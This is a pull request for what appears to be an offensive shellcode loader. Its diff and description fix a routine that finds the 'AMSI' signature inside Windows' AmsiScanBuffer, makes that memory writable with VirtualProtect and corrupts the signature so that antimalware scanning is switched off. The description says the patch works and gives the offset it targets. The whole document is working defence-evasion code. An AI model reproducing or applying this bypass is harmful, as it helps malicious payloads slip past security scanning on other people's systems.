### PR TITLE
Fix BYPASS_AMSI_C

### DIFF
--- a/loader/bypass.c
+++ b/loader/bypass.c
@@ -162,18 +162,20 @@ BOOL DisableAMSI(PDONUT_INSTANCE inst) {
     // FALSE because it should exist.
     cs = (PBYTE)xGetProcAddress(inst, dll, inst->amsiScanBuf, 0);
     if(cs == NULL) return FALSE;
-    
+
     // scan for signature
-    for(i=0;;i++) {
+    for(i=0;i<255;i++) 
+    {
       Signature = (PDWORD)&cs[i];
       // is it "AMSI"?
-      if(*Signature == *(PDWORD)inst->amsi) {
+      if(cs[i]==inst->amsi[0]-32 && cs[i+1]==inst->amsi[1]-32 && cs[i+2]==inst->amsi[2]-32 && cs[i+3]==inst->amsi[3]-32 )
+      {
         // set memory protection for write access
         inst->api.VirtualProtect(cs, sizeof(DWORD), 
           PAGE_EXECUTE_READWRITE, &op);
           
         // change signature
-        *Signature++;
+        (*Signature)++;
         
         // set memory back to original protection
         inst->api.VirtualProtect(cs, sizeof(DWORD), op, &t);


### PR DESCRIPTION
The variable inst->amsi is actually "amsi" lower case. However we search for "AMSI" uppercase so the "if(*Signature == *(PDWORD)inst->amsi)" doesn't work.
This quick fix is working to patch the context check done by AmsiScanBuffer at offset 0x7D.